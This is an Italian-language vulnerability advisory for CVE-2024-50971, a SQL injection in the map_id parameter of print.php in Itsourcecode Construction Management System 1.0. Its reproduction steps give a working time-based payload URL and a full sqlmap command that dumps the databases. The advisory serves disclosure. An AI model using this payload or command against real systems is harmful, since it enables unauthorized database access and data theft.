CVE-2024-50971
Descrizione
Una vulnerabilità di SQL injection in print.php di Itsourcecode Construction Management System 1.0 consente a un attaccante remoto di eseguire comandi SQL arbitrari tramite il parametro map_id.
Tipo di vulnerabilità
SQL Injection
Fornitore del prodotto
Itsourcecode
Base del codice prodotto interessato:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Componente interessato:
Il sistema Itsourcecode Construction Management System v1.0 è vulnerabile a SQL injection tramite il parametro map_id nella pagina print.php.
Vettori di attacco:
- Imposta l'applicazione localmente, registra un account e accedi con le credenziali admin:admin
- Naviga al seguente URL nel tuo browser:
http://localhost/monitoring_system/print.php?map_id=67
- Inietta il Payload SQL:
Modifica il parametro map_id nell'URL per includere un payload di SQL injection basato sul tempo.
http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
- Osserva la risposta dell'applicazione:
La pagina dovrebbe impiegare notevolmente più tempo (15 secondi) per caricarsi se l'iniezione ha successo, confermando che il parametro map_id è vulnerabile a SQL injection.
- Ora usa lo strumento SQLMap per ulteriore sfruttamento e dump dei database usando il comando seguente:
sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Riferimenti:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection